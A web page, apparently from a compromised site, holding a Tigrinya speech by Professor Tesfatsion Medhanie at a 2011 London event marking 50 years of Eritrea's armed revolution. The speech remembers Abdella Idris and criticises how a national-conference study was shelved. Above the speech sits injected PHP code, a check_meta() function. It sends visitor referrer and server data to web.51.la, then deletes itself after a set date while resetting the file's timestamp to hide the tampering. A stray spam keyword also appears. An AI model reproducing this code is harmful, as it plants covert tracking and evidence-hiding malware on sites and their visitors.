check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ምጅማርስ ቅድሚ ፍርቂ ዘመን ተጀሚሩ!!ኣብ ጉዕዞኡ ዝተጨውየ ሰውራ
кремлевская диета

ምጅማርስ ቅድሚ ፍርቂ ዘመን ተጀሚሩ!!ኣብ ጉዕዞኡ ዝተጨውየ ሰውራ

User Rating: / 13
PoorBest 

 

 

 

 

ምጅማርስ ቅድሚ ፍርቂ ዘመን ተጀሚሩ!!

ኣብ ጉዕዞኡ ዝተጨውየ ሰውራ

 

ተስፋጽዮን መድሃኔ (ፕሮፈሰር)

 

ብረመን፣ ሃገረ-ጀርመን

 

 

መበል 50 ዓመት ምጅማር ብረታዊ ሰውራ ዝተኸበረሉ በዓል

 

 

ተጋድሎ ሓርነት ኤርትራ

 

 

ለንደን፡ ሰፕተምበር 24፡ 2011

 

 

 

 

ሓበሬታ

 

እዚ ሑፍ’ዚ ብ 24 መስከረም 2011 (ብጎርጎርዮሳዊ ኣቈፃራ) ኣብ’ቲ ኣብ ከተማ ለንደን፡ ብተጋድሎ ሓርነት ኤርትራ - ጨንፈር ዓባይ ብሪጣንያ፡ ዝተወደበ፡ መበል 50 ዓመት ምጅማር ብረታዊ ሰውራ ዝተኸበረሉ በዓል፡ ብፕሮፈሰር ተስፋዮን መድሃኔ ዝተዋህበ ኣስተምህሮ ኢዩ፡፡ እዚ ኣሰተምህሮ’ዚ ፕሮፈሰር ተስፋዮን ብሙሉእ ነፃነት፡ ከም ውልቀ-ሰብ ሓላፍነት ወሲዶም ዝሃብዎ ኢዩ፡፡  

 

ኣብ’ቲ በዓልና ተረኺቦም፡ ጠቓሚ ኣስተምህሮ ብምሃቦም፡ ንፕሮፈሰር ተስፋዮን መድሃኔ ካብ ልቢ ነመስግኖም፡፡

 

ተጋድሎ ሓርነት ኤርትራ

ጨንፈር ዓባይ ብሪጣንያ

 

 

 

ኣብ’ዚ ሑፍ’ዚ ንገለ እዋናዊ ሕቶታት ብዝምልከት ተወሲዶም ዘለዉ መርገጻትን፡ ተገሊጾም ዘለዉ ሓሳባትን፡ ምስ ኣረኣእያ ናይቶም ንሃገራዊ ዋዕላ - ኣወዳድባኡን ኣገባቡን ብዘየገድስ - ብመሰረቱ ዝቃወሙ ዝነበሩ: ንዘይዕጥቃዊ ኣገባብ ቃልስን ንሓውሰ-ጽገናን ዝጣበቑ፡ ውድባት ዝመሳሰሉ ኰይኖም ክርኣዩ ይኽእሉ ኢዮም፡፡ እዚ ተመሳሳልነትዚ ብዘየገድስ፡ ኣብዚ ሑፍዚ ንኹሉ ሕቶታት ብዝርኢ ተገሊጾም ዘለዉ ሓሳባት ኣብ ኤርትራ ዘሎ ስርዓት ብሱረ-መሰረቱ ክእለ ኣለዎ ካብ ዝብል መንፈስ ዝነቐሉ ብሙዃኖም፡ ምስ መርገጻትን ኣረኣእያን ናይዞም ዝተባህሉ ውድባት ዘራኽብ ከምዘይብሎም እሕብር፡፡

 

 

ተስፋጽዮን መድሃኔ፡፡ 

 

 

ምጅማርስ ቅድሚ ፍርቂ ዘመን ተጀሚሩ!!

ኣብ ጉዕዞኡ ዝተጨውየ ሰውራ

 

 

ተስፋዮን መድሃኔ (ፕሮፈሰር)

ብረመን፣ ሃገረ-ጀርመን

 

ዝኸበርኩም መራሕትን ወከልትን ኣባላትን ውድብ ተጋድሎ ሓርነት ኤርትራ

ዝኸበርክንን ዝኸበርኩምን አባላትን ደገፍትን ካልኦት ተቓወምቲ ውድባት ኤርትራ ዝኸበርክንን ዝኸበርኩምን ተሳተፍቲ ብሓበራ፤

 

ኣቐዲመ ንኣዳለውቲ ናይ’ዚ ታሪኻዊ በዓል’ዚ ብዘቕረቡለይ ዕድመ ምስጋናይ ከቕርበሎም እፈቱ። ቀጺለ ኸኣ ብኣጋጣሚ ናይ’ዚ ሎሚ መዓልቲ ዝኽበር ዘሎ ታሪኽ ምስ እዞም አብዚ ኣኼባ’ዚ ትሳተፉ ዘለኹም ተቐማጦ ሃገረ-እንግሊዝ ንኽላለ ዕድል ብምርካበይ ዓቢ ሓጐስ ከምዝስምዓኒ ክገልጽ እደሊ።

 

ብናተይ ኣረኣእያ እዚ አኼባ’ዚ ታሪኻዊ ዝኾነሉ ዝተፈላለየ ምኽንያታት ኣሎ። ዕለት ሓደ ናይዚ ወርሕ’ዚ ምጅማር ብረታዊ ሰውራ ኤርትራ ሓምሳ ዓመቱ ዝመልኣሉ ነይሩ። እዚ ናይ ሎሚ መዓልቲ ኣኼባ እምበኣር እዚ ታሪኽ’ዚ ዝዝከረሉን ዝኽበረሉን ዘሎ ስለዝኾነ ዓቢ ትርጉም ኣለዎ። ካልኣይ፡ እዚ በዓል’ዚ ዝኽበር ዘሎ ገና መንፈቕ እኳ ዘይመልአ ሕልፈት ተጋዳላይ ዓብደላ እድሪስ ዝዝከረሉ፤ ብኡኡ አቢሉ ኸኣ ግደ እዚ ሓርበኛ’ዚ ኣብ ታሪኽ ሰውራና ብሓዲሽ መንፈስን ካብ ሓዲሽ መንጽርን ኣብ ዝምዘነሉ ዘሎ እዋን ኢዩ። ስለ’ዚ ኸኣ ኣገዳስነት እዚ ኣኼባ’ዚ ዕዙዝ ይኸውን።

 

ንዓይ ብዝርኢ እዛ መዓልቲ’ዚኣ ታሪኻዊት ኢያ። ኣብ ሃገረ-እንግሊዝ ንፈለማ እዋን እየ ኣብ ናይ ኤርትራውያን በዓል ዝሳተፍ ዘለኹ፤ ከምኡ እውን ድሕሪ ተረኽቦ ምፍንጫል 1982 ኣብ ናይ ተ.ሓ. ኤ መደብ ክካፈል ሎሚ ንመጀመርያ ጊዜይ ኢዩ።

 

ከምዚ ዝኣመሰለ መደብ ኣብ ሃገረ-እንግሊዝ ክካየድ ከሎ ውድብ ተጋድሎ ሓርነት ኤርትራ ኣብ ምዕራባዊ ዓለም ትርጉም ዘለዎ ህላዌ ተጨብጭብ ከምዘላ፡ እቲ ሕንጹጽ ሃገራዊ ዕላማኣ ዝሓቶ ንኹሉ ኤርትራዊ ዝምልከት ክፉትነት ከኣ ተአማንነት ይረክብን ብተግባር ይገሃድን ከምዘሎ ይበርህ። በዚ ምኽንያት’ዚ እውን እምበኣር እዛ መዓልቲ’ዚኣ ኣገዳሲት ትኸውን።

 

ብ 3 መስከረም መበል 50 ዓመት ምጅማር ብረታዊ ሰውራ ንምኽባር ኣብ ከተማ ፍራንክፈርት፡ ሃገረ-ጀርመን፡ ብግሃድኤ ዝተዳለወ በዓል ነይሩ። ኣብኡ ንኽሳተፍ ተዓዲመስ፡ ተሳቲፈ እውን። ዝሃብኩዎ ስሩዕ መደረ ኣይነበረን። ኣብቲ ዝካየድ ዝነበረ ክትዓት ግን ንገለ ሕቶታት ብዝርኢ ሓሳባት ክገልጽ ዕድል ተዋሂቡኒ ሕጽር ዝበለት ርእይቶ ኣስሚዐ ነይረ። ኣብዚ ናይ ሎሚ መዓልቲ ኣኼባ እምበኣር ነቲ ኣብ ፍራንክፈርት ዝጠቐስኩዎ ነጥብታትን ምስኡ ዝዛመድ ተወሳኺ ሓሳባትን ቁሩብ ዝርዝር ኣቢለ ከቕርቦ እየ። ከምኡ ቅድሚ ምግባረይ ግን ሎሚ መዓልቲ ንነብስሄር ዓብደላ እድሪስ እንዝክረሉ ኣጋጣሚ እውን ስለዝዀነ ገለ ካብ ተዘክሮታተይ ናይ ዓብደላን በዚ እዋንዚ ንግዲኡ ኣብ ሰውራ ኤርትራ ብዝምልከት ዘሎኒ ኣራኣእያን ኣሕጽር ኣቢለ ክገልጽ ይፈቐደለይ።

 

ኣነ ሓደ ካብቶም ንዓብደላ እድሪስ ብቐረባ ዝፈልጥዎ ዝነበሩ ሰባት ኣይኰንኩን። ንገለ ሕቶታት ብዝርኢ ርእይቶታት ንኽህብ መሰረት ክኾነኒ ዝኽእል መጠን ሌላ ግን ነይሩኒ ኢዩ። ስለዚ ነዘን ዝስዕባ ርእይቶታትን ትዕዝብትታትን ምግላጽ ዘየጥዕመለይ ኰይኑ ኣይተራእየንን።

 

ምስ ዓብደላ መጀመርያ ዝተራኸብናን ዝተላለናን ብሰብዓታት አብ ኸርቱም ኢዩ። ክሳብ ኣነ ንኸርቱም ዝገድፎ ምስ ጉዳይ ሰውራ ኤርትራ ብዝተተሓሓዘ ኣብ ገለ ኣጋጣሚታት ተራኺብና ተመያዪጥና ኔርና ኢና። ተራኺብና ንማየጥ እምበር ፍልጠትና ዓሚቕ ወይ ናይ ቀረባ ክሳብ ሙዃን ዝበጽሐ ኣይነበረን። በዚ ምኽንያት’ዚ ብዙሕ ካብ’ቲ አነ ብዛዕባ ዓብደላ ዝነበረኒ ኣፍልጦ ግጉይ ሓበሬታታት ዘሰነዮ ኢዩ ዝነበረ።

 

ሽም ዓብደላ እድሪስ ኣብ ዓውዲ ሰውራ ኤርትራ ኣዚዩ ምሩር ኢዩ ዝነበረ። ምኽንያት  - ወይ ቀንዲ ምኽንያት - ናይ’ዚ እንታይ ኢዩ ነይሩ ብዛዕባ ዝብል ሕቶ ዝተፈላለየ ርእይቶታት ክህሉ ይኽእል ኢዩ። ንዓይ ከምዝመስለኒ ግን እቲ ቀንዲ ምኽንያት ኣብ ውድብ ተጋድሎ ሓርነት ኤርትራ መሪሕነት ህዝባዊ ግንባር ዝፈርሕዎ ዝነበሩ መሪሕ ባእታ ዓብደላ እድሪስ ምንባሩ ኢዩ። እዚ እቲ መሰረታዊ መግለጺ’ዩ ኢየ ዝብለኩም ዘለኹ፤ ካብኡ ተረፈ፡ ኣብ ውሽጢ ውድብ ተጋድሎ ሓርነት ኤርትራ ንዓብደላ ጉድለታት ስለዝረኸቡሉ ወይ እውን ገበናት ፈፂሙ ኢዩ ኢሎም ስለዝኣመኑ ዘማርርዎ ዝነበሩ እውን ነይሮም ኢዮም። ሽም ዓብደላ ዝመረረሉ ቀንዲ ምኽንያት ግን፡ እንደገና ከስምረሉ፡ ዓብደላ እድሪስ፡ ኢሳያስ ኣፍወርቅን ተሓባበርቱን አዚዮም ዝፈርሕዎ ባእታ ምንባሩ ኢዩ።

 

እቲ ብዛዕባ ዓብደላ እድሪስ ዝዋፈር ዝነበረ ጸለመ ንኹላትና ጸልዩና ነይሩ ኢዩ። ኣነ እውን በቲ ጸለመ’ቲ ተጸልየስ፡ ኣብቲ ብዙሕ ሰብ - ገሊኡ ብተንኰል ገሊኡን ከአ ብዕሽነት - ዝረገሞ ናይ ፈለማ መጽሓፈይ ንዓብደላ ብኣሉታ ገሊጸዮ ነይረ ኢየ። እቲ ኣሉታዊ ገምጋመይ ንገለ ዓመታት ቀጸለ።

 

ነቲ ብዛዕባ ዓብደላ ዝነበረንን ኣብ ጽሑፍ ዘስፈርኩዎን ኣረኣእያ ክምርምሮን ዳግመ-ግምት ክገብረሉን ዝተገደድኩ ካብ 1993 ጀሚሩ ኢዩ። ኣብ’ታ ዓመት እቲኣ፡ ኣብ ከተማ ካስል፡ ሃገረ-ጀርመን፡ ብናይ’ቲ እዋን’ቲ ተ.ሓ.ኤ ሰውራዊ ባይቶ ኣብ ዝተዳለወ ዓመታዊ ሰፊሕ በዓል (ፈስቲቫል) ኣነ ንፈለማ እዋን ንዲሞክራስን ንኩነታት ኤርትራን ዝምልከት አስተምህሮ ኣቕረብኩ። እቲ አስተምህሮ ብቪዲዮ ተቐሪጹ ኣብ ብዙሕ ሃገራት ተዘርግሐ። ዓብደላ ነቲ ቪዲዮ ኣብ ሱዳን ርእይዎ፤ ነቲ መልእኽቱ ኸኣ ኣዕሚቑ ኣስተማቒሩዎ።

 

ዓብደላ ነቲ ቪዲዮ ድሕሪ ምርኣዩ ኣብ ጀርመን ብዝነበረ ወኪል ተ.ሓ.ኤ.- ሓው እድሪስ ዳፊ - ኣቢሉ ሰላምታን መልእኽትን ሰደደለይ። ትሕዝቶ ናይ’ቲ መልእኽቱ ”እታ ናይ ካስል መደረ ኣዚያ ኣገዳሲት ኢያ እሞ ናብ ቋንቋ ዓረብ ትተርጐም፤ ሰውራዊ ባይቶ ባዕሎም ዝትርጉምዋ እንተዀይኖም ጽቡቕ! ዘይትርጉምዋ እንተዀይኖም ግን ንሕና - ማለት ጀብሃ - ክንትርጉማ ኣፍቅደልና” ዚብል ኢዩ ነይሩ። ኣነ ኣዚዩ ባህ ኢሉኒ፤ ንሰውራዊ ባይቶ እምበኣር ክውከሶም ኢለ “ትትርጉምዋ እንተዀንኩም ነዛ መደረ ተርጉምዋ፤ ካብኡ ተረፈ ጀብሃ ክትርጉምዋ ድሉዋት ኢዮም” በልኩዎም። ሰውራዊ ባይቶ ኸኣ ንሕና ክንትርጉማ ኢና ዝብል መልሲ ሃቡኒ፤ ብርግጽ ከኣ ተርጒሞማ።

 

እታ ዓብደላ ብ1993 ዝሰደደለይ ሰላምታን ወኸሳን ዝሓዘለት መልእኽቲ ንዓይ ኣዚያ አገዳሲት ነበረት። ዓብደላ፡ ኣብ መጽሓፈይ ክንደይ ወቒሰዮ ክንሰይ፡ ነዚ ኹሉ ሸለል ኢሉ፡ ብረብሓ ቃልስና ጥራይ ተገዲሱ ሰላምታ ልኢኹ፡ ከምዚ ንግበር ኢሉ ሃናጺ ሓሳብ ከቕርበለይ ከሎ ክሳብ ክንደይ ብርቱዕ ናይ ፖለቲካ ሰብ ምንባሩ ተረዲአ።

 

ካብ”ቲ እዋን”ቲ ንደሓር ነቲ ብዛዕባ ዓብደላ ዝበሃል ዝነበረ ኩሉ ዳግመ-ምርምር አብ ምግባር ኣጽዒቐ ተዋፈርኩ፤ ንዓብደላ ኸአ አብ ጉዕዞ ቃልሲ ብልቢ እናተዓዘብኩዎ መጺአ። ብዝገበርኩዎ ትዕዝብቲ፡ ብዙሕ ካብቲ ብዛዕባኡ ዝነበረ አሉታዊ ያታ ናይ ሓሶት ጸለመ ምንባሩን፡ ኣነ እውን ኣብቲ ናይ ፈለማ መጽሓፍ በቲ ጸለመታት እቲ ዝተጸልወ ትሕዝቶ ከምዘስፈርኩ ተረዲኡኒ። ዳግማይ ሕታም ኣብ ዝገብረሉ ጊዜ ነቲ ክእረም ዘለዎ ሓበሬታ ንኽእርም ብሕልናይ ወሰንኩ።

 

ብ1997 ዓ. ም. ሓደ ጽቡቕ ኣጋጣሚ ተኸሲቱ። በቲ እዋንቲ ዓብደላ ዝተፈላለየ ጉዳያት ንኸሳልጥ ንሃገረ-ጀርመን መጺኡ ነበረ’ሞ ኣብ ከተማ ሃምበርግ ብኣካል ንምርካቡ ዕድል ረኺበ። ልባዊ ሰላምታ ተለዋዊጥና ነቲ ዝሓለፈ ታሪኽ ብሓጺሩ ገምጊምና ብልቢ ተረዳዳእና። ክልቴና ንበይንና ኰይንና ዝርርብ ኣብ ምጅማርና ዓብደላ ብዛዕባ’ቲ መጽሓፈይ ኣልዒሉ “እቲ መጽሓፍካ ጸቡቕ መምሃሪ ኰይኑና ኢዩ፤ ብዙሕ ኣዛሪቡና፤ ኣካቲዑናን ኣማዕቢሉናን” በለኒ። ኣነ ብሓቂ ገሪሙኒ፤ ዓብደላ ስምዒቱ ናይ ምቁጽጻር ዓቢ ብቕዓት ዘለዎ፡ ሓያል ናይ ፖለቲካ ሰብ ከምዝነበረ እንደገና፡ ማለት፡ ብዝበለጸ ክርዳእ ክኢለ። ምስ’ዚ ብዝተተሓሓዘ ክጠቕሶ ዝደሊ ሓደ ዘገርም ነገር እቲ ኣብ መጽሓፈይ ዝሃሰኹዎ ዓብደላ ከመጉሰኒ ከሎ፡ ገሊኦም ተቓወምቲ ውድባት፡ ዘይወጻዕኩዎም - ንገሊኦምሰ ወረ ዝነኣድኩዎም - ክንሰይ ካብ ናይ ሻዕቢያን ወያኔን መናፍሓት ዘይሓይሽ ጸለመ ኣብ ልዕለይ የካይዱ ምንባሮም ኢዩ።

 

ብመሰረት ናይ’ቲ ካብ’ቲ እዋን’ቲ ንደሓር ዝመጸ ምዕብልናታት ንብዙሓት ተቓወምቲ ውድባት ዝሓቖፈ “ምሕዝነት” ቆመ፤ ምስ ንጥፈታት ምሕዝነትን ካልእ ጉዳያት ሃገርን ብዝተተሓሓዘ ምስ ዓብደላ እድሪስ ብጽቡቕ ምርድዳእ ተሓባቢርና።

 

ካብ 1997 ንደሓር ምስ ዓብደላ ኣብ ናይ ምሕዝነት ጉዳያት ብምትሕብባር ክንቀሳቐስ ምኽአለይ ከም ዓቢ ዕድል ገይረ እቖጽሮ። ነቲ ቅድም ዝነበረኒ ግጉይ ኣረኣእያ ንኽእርም፣ ብዓቢኡ ኸአ ነቲ ግጉይ ኣራኣእያ ክእርሞ ሙዃነይ ንዓብደላ ክገልጸሉ ዕድል ብምርካበይ ዓቢ ሓጐስ ይስምዓኒ።

 

ብዛዕባ ኣበርክቶ ዓብደላ ኣብ ታሪኽ ሰውራ ኤርትራ ካባይ ንላዕሊ ትፈልጡ ኣብዚ ገዛዚ ኣለኹም። ምግላጹ ኣየድልየንን ኢዩ። ንሰውራ ብዝምልከት ኣገዳስነት ዝነበረን ገለ መለለዪታት ከምዝነበራኦ ግን ክጠቅስ እደሊ ኢየ፤ ቀንዲ ካብአተን ከኣ ብናተይ ኣራኣእያ እዘን ዝስዕባ ኢየን፤

 

1. ጽንዓት፤ ንብዙሓት ዓብደላ እድሪስ ናይ ጽንዓት ኣርኣያ ነይሩ። ኩነታት እናጠለመ ኣብዝኸደሉ እዋን ከይተረፈ ብዘይ ተስፋ ሙቕራጽ ይቃለስን የቃልስን ነይሩ። ተጋድሎ ሓርነት ኤርትራ - ጀብሃ - ከም ኣርማ ሓድነት ህዝብን ሃገራዊ ብድሆን ክሳብ ሕጂ ኣብ ምህላዋ ጽንዓት ዓብደላ እድሪስ ዓቢ ግደ ነይሩዎ።

 

2. ተወፋይነት፤ ብዘለኒ ሓበሬታ፡ ዓብደላ ናይ ውግእ ቀያሲ ጥራይ ከይኰነ፡ ባዕሉ እውን አብ ዓውደ ውግእ ዝኣቱ ተጋዳላይ ነይሩ።

 

3. ህዱእ ብርትዐ፤ ዓብደላ ርግእ ኢሉ ዝዛረብ፡ ርእሰ-ምቁጽጻር ዝነበሮ ሰብ ነይሩ፤ ኣብ ሱዳን ይኹን ኣብ ኣውሮጳ ኣብ ዝተፈላለየ ኩነታት ሓሳብ ክለዋወጥ ከሎ ኣስተብሂለሉ ኣለኹ፤ ውሑዳት ድአ ኰይነን እምበር ኣኼባታት ክመርሕ እውን ርእየዮ ኣለኹ፤ ድምጹ ሓፍ ኣቢሉ ወይ ገንፊሉ ክዛረብ ሰሚዔዮ ኣይፈልጥን።

 

4. ሓልዮት ንብጾት፤ ሓደ መራሒ ንብጾቱ፡ ኣብ ዝደኸሙሉ እዋን ከደፋፍሮምን ከደልድሎምን፣ ኣብ ዝብርትዕሉን ዘፍርይሉን ጊዜ ከአ ብቕዓቶም ክፈልጠሎምን ከተባብዖምን ኢዩ ዝግባእ፤ ብዙሓት ከምዝምስክርዎ፡ ዓብደላ እዚ ጠባይዚ ነይሩዎ ኢዩ። ኣነ ብጭቡጥ ከምዝተሞከርኩዎ እውን በኹነታት ንዝተሃስየ ብጻዩ ሞራል ንምሃብ ብሓልዮት ዝዋፈር ነይሩ።

 

5. ሃገራውነት፤ እቲ ኣዚዩ ዘሕዝን ጸለመ ንዓብደላ ብቀቢላነትን ሃይማኖታዊ ድርቅናን ዝኸስስ ነይሩ። እቲ ሓቂ ብኣንጻሩ ከምዝዀነ ሕጂ እናበርሀ ይመጽእ አሎ። ዓብደላ ጽፉፍ ሃገራዊ ነይሩ፤ ወገናዊ ወይ ቀቢላዊ ሸቶ አይነበሮን። ከምኡ እውን እስላማዊ ሃይማኖታዊ ድርቅና ዘጥቅዖ ሰብ ኣይነበረን። ዓብደላ ዕልማናዊ ኢዩ ነይሩ፤ ህዝባዊ ግንባርን ልኡኻታን ንዓብደላ ከም ወኪል እስላማዊ ሓይልታትን ቀቢላታት ምዕራባዊ ቆላን ገይሮም የቕርብዎ ነይሮም። ሕጂ ክርአ እንከሎ ግን እቶም “ዓማ!” እናበሉ ንዓብደላን ንተ.ሓ.ኤ ብሓበራን ዘካፍኡ ዝነበሩ ኢዮም ንገዛእ ርእሶም ብዝተፈላለየ ጥበብ ወገናውን  ሃይማኖታውን ሜላታት ዝትግብሩ ዝነበሩ። ዓብደላ ካብ ንእስነቱ ኣትሒዙ ብኤርትራዊ ሃገራውነት ዝተዀስኰሰ ኢዩ ነይሩ። ዕሸል መንእሰይ ከሎ ኢዩ ምስ ሰውራ ዝተላለየ፤ እኳ ደአ ኣብ ሓደ ቃለ-መሐትት ከምዝገለጾ፡ ወዲ 15 ወይ 16 ዓመት ከሎ ምስ ጀማር ብረታዊ ገድሊ ሓሚድ እድሪስ ዓወተ ዝተራኸበ ኢዩ። እዝን ከምዝን ታሪኽ ዘለዎ ዓብደላ እድሪስ ሓቀኛ ሓርበኛውን መራሕ ሃገራዊ ምንቅስቓስን ንሙዃን በቕዐ።

 

በዚ ኣቢለ እምበኣር ኣብቲ ቀንዲ ምኽንያት ወይ ጉዳይ ናይ ሎሚ መዓልቲ ክኣቱ።

 

ሎሚ መበል 50 ዓመት ምጅማር ብረታዊ ሰውራ ነብዕል ኣሎና፤ እቲ ሰውራ ዝተበገሰ ንህዝብና ነፃነትን ሓርነትን ንኸጐናጽፍ ኢዩ ዝነበረ፡፡ ህሉው ኩነታት ኤርትራ - ማለት ዘሎ ኣረሜናዊ ጽቕጠት፣ ንምግላፁ ዘፀግም ሓሳረ መከራ፣ ዘሎ ድኽነት፣ ዘሎ ባርነት - ኣብ ግምት ከነእቱ ከሎና ግን ህዝብና ኣብ ታሪኽና ተራእዩ ኣብ ዘይፈልጥ ክቱር መግዛእቲ ተደቕዲቑ ከምዘሎ እምበር ነፃነት ይኹን ሓርነት ከምዘይተጐናፀፈ የበርሃልና፡፡ በዚ ምኽንያትዚ እየ ነዚ መደረዚ “ምጅማርስ ቅድሚ 50 ዓመት ተጀሚሩ!“ ዝብል ቃና ጓሂ ዘለዎ ኣርእስቲ ዝሃብኩዎ፡፡ እሞ እንታይ ደአ ዀነ ዓወተ ዘበገሶ ብረታዊ ሰውራ? ቅድሚ ሕጂ ብተደጋጋሚ ከምእተገልፀ፡ ዓወተ ዘበገሶ ሰውራ ብናይ ምፍንጫላትን ውግእ ሓድሓድን ጐደናታት ኣቢሉ ንረብሓ ባዕዳዊ ዕላማ ተጨውዩ ኢዩ፡፡ እዚ ሕጂ ኣብ ኤርትራ ሰፊኑ ዘሎ፡ ንህዝብና ኣብ ውሽጢ ባርያ ገይሩ፡ ኣብ ጐረባብቲ ሃገራት ተሰዲዱ ኸአ ካብ ናይ ባርነት ኣዚዩ ዘይሓይሽ ህይወት ንኸሕልፍ ዝገብር ዘሎ ኩነታት፡ ውጽኢት ናይቲ ቅድሚ 50 ዓመት ዝተጀመረ ሰውራ ዘይኰነስ ውጽኢት ናይቲ ጭውያ ኢዩ፡፡

 

ዓወተ ዘበገሶ ብረታዊ ሰውራ ብ1980-81 ኢዩ ዝተጨውየ፡፡ ካብኡ ንደሓር ብዓብላልነት ህዝባዊ ግንባር “ሰውራ ኤርትራ“ ብዝብል ጉልባብ ዝተኻየደ ብረታዊ ምንቅስቓስ ንጥቕምን መሰልን ህዝብና ዘይኰነስ ንረብሓ ባዕዳዊ ዕላማ ኢዩ ዘገልገለ፡፡ ከም ውጽኢቱ ኸኣ ንህዝቢ ኤርትራ ብሙሉኡ ዝጭቁን ዘሎ ስርዓት ኣብ ሃገርና ሰፊኑ ይርከብ፡፡ ስለዚ እምበኣር ህዝቢ ኤርትራ ብሙሉኡ ኣንፃር እዚ ብኢሳያስ ኣፍወርቂ ዝውነን ዲክታቶርያዊ ስርዓት ኣብ ምቅላስ ጥቕሚ ኣለዎ፡፡ ናይ ቃልሱ ወይ ናይ ጥርናፌኡ መልክዕ ኸአ ግንባር - ማለት ጀብሃ - ክኸውን ኣለዎ ማለት ኢዩ፡፡

 

ኣብዚ እዋንዚ ኣብ ደምበ ሓይልታት ተቓውሞ ዘዛርብ ዘሎ ዓቢ ጉዳይ ወይ ዛዕባ ሃገራዊ ዋዕላ ኢዩ፡፡ እዚ ጉዳይ ወይ ኣርእስትዚ ካብ ዝነቅል ዓመታት ኰይኑዎ ኣሎ፡፡ ከም ኣርእስትን ዛዕባ መጽናዕትን ኣዚዩ ዝጐሃረ ግን ካብ 2003 ንደሓር ኢዩ፡፡ ኣብቲ ናይ 2003 ፈስቲቫል ካስል ዝተኣከቡ ወከልቲ ዝተፈላለዩ ውድባትን ምንቅስቓሳትን ሓደ ማኒፈስቶ - ማኒፈስቶ ካስል - ኣወጁ፡፡ ብድሕሪኡ ብመሰረት እቲ ማኒፈሰቶ ብዛዕባዚ ጉዳይዚ ንኽትንቀሳቐስ ሓንቲ ሽማግለ ቆመት፤ ኣነ ኻአ ብኣባላታ ኣቦ መንበራ ኰይነ ተመረጽኩ፡፡ እዛ ሽማግለዚኣ፡ ዓቕማን ጊዜኣን ብዝፈቐደላ መጠን ኣብ ኩነታትና ሃገራዊ ዋዕላ እንታይ ዕማማት ከስልጥ ከምዘለዎ፣ ብኸመይ ክውደብ፣ ክካየድ፣ ክምወል ከምዘለዎ፣ ንውሳኔታቱ ብኸመይ ከተግብር ከምዘለዎን ዘመልክት ሃገራዊ ዋዕላ ንሓድነትን ድሕነትን ኤርትራ ዘርእስቱ ሰፊሕ መጽናዕቲ ብትግርኛን ዓረብን ኣዳልያ ንኺዳን ኣረከበቶ፤ ናብ ህዝቢ ኸኣ ዘርግሐቶ፡፡

 

እዛ መጽናዕትና እምበኣር ናትና ኢያ፤ ወነንታ ንሕና ኤርትራውያን ኢና፤ ወከልቲ ተቓወምቲ ውድባትን ሲቪካውያን ማሕበራትን ብሙሉእ ነፃነት ዘካየድዎ መስርሕ ዝወለዳ ሉዓላዊት ሰነድ ኢያ፡፡

 

ኪዳን፡ ከምቲ ቅድሚ ሕጂ ኣብ ዝተፈላለየ ኣጋጣሚታት ዝገለጽኩዎ፡ ነቲ ዝቐረበሎም መጽናዕቲ ኣሽምባይዶ ብዕሊ ክጥቀሙሉስ፡ ”በፂሑና“ ዝብል ዕላዊ ሓበሬታ እኳ ኣይሃቡናን፡፡ ቅድሚ ቁሩብ ሰሙናት ሓደ ናይ ቃልሲ ብጻየይ ብዛዕባዚ ጉዳይዚ ከዕልለኒ ከሎ “ኪዳን ደኣ ነዛ ናይ ዋዕላ መጽናዕቲ ከምታ ኢሳያስ ኣፍወርቂ ነታ ናይ ፕሮፈሰር በረኸት ቅዋም ዝገበራ እንዲዮም ገይሮማ፤ ኢሳያስ ነታ ቅዋም ትቕብል ኣቢሉ ቀቢሩዋ፤ ኪዳን ከአ ነታ መጽናዕቲ ትቕብል ኣቢሎም ቀቢሮማ፤” በለኒ፡፡ ሓቂ ኢዩ፣ ኪዳን ነቲ ብዙሕ ጊዜን ፃዕርን ዝጠፍኣሉ ስራሕ ቀቢሮሞ ኢዮም፡፡ ብተወሳኺ፡ ኣባላት ናይታ ነቲ ዋዕላ ከተዳሉ በኺዳን ዝተመዘዘት ሽማግለ እውን ኣብ ምቕባር ናይዛ ሰነድዚኣ ግደ ነይሩዎም ኢዩ፡፡ እቲ መጽናዕትና፡ ግን ብትሕዝቶኡ ሐቀኛን ቅኑዕን፡ ብኣሰራርሕኡ ከኣ ህዝባውን ዲሞክራስያውን ስለዝዀነ ተቐቢሩ ኣይቅበርን ኢዩ፤ ንሓድነትን ድሕነትን ኤርትራ ዝዓለመ፡ ሓቀኛ ሃገራዊ ዋዕላ ክካየድ እንተድኣ ኰይኑ ኣወዳድባኡ ኰነ ኣፈፃጽማኡ ካብቲ ኣብ መጽናዕትና ሰፊሩ ዘሎ ሓሳባትን ኣገባባትን ዝሓልፍ ኣይክኸውንን ኢዩ፡፡

 

ኣብዚ ጊዜያትዚ ዋዕላ ብዛዕባ ዝተባህለ መስርሕ ብዙሕ ነገራት ይካየድ ከምዘሎ ኩሉኹም ትከታተሉዎ ኣለኹም፡፡ ኣነ ብዝዀነ መልክዕ ከምዘየለኹሉ እውን ኣስተብሂልኩም ትዀኑ፤ እኳ ደኣ ስለምንታይ ኢኻ ዘይትሳተፍ ዘለኻ ኢሎም ገለ ሰባት ብመንፈስ ሓልዮት ተወኪሶምኒ ኢዮም፡፡ ምኽንያታት ኣሎኒ፤ ሕጂ ኣብ ዝርዝር ምኽንያታተይ ክኣትው ኣይደልን ኢየ፡፡ ክትግምትዎ ከምእትኽእሉ ግን ካብ ኣጀማምርኡ ኣትሒዙ ባህ ዘይበለኒ ነገራት ኣስተብሂለ ኢየ፡፡ ንኣብነት ከምዚ ኣቐዲመ ክጠቕሶ ዝፀናሕኩ ኣነን ብፆተይን ክንደይ ፃዕሪ ዝገበርናሉ መጽናዕቲ ቀቢርካ ዝካየድ ጉዳይ ንዓይን ነቶም ካልኦት ኣባላት ሽማግለን ዓቢ ውርደት ኢዩ፤ ከጠራጥረንን ሕርኽርኽ ክብለንን ከአ ናይ ግድን ኢዩ፡፡ ከምዚ ንዝኣመሰለ ውርደት ኣሜን ኢለ ክቕበል ትጽበዩኒ ኣሕዋትን ኣሓትን እንተሊኹም ትጋገዩ ኣለኹም!!

 

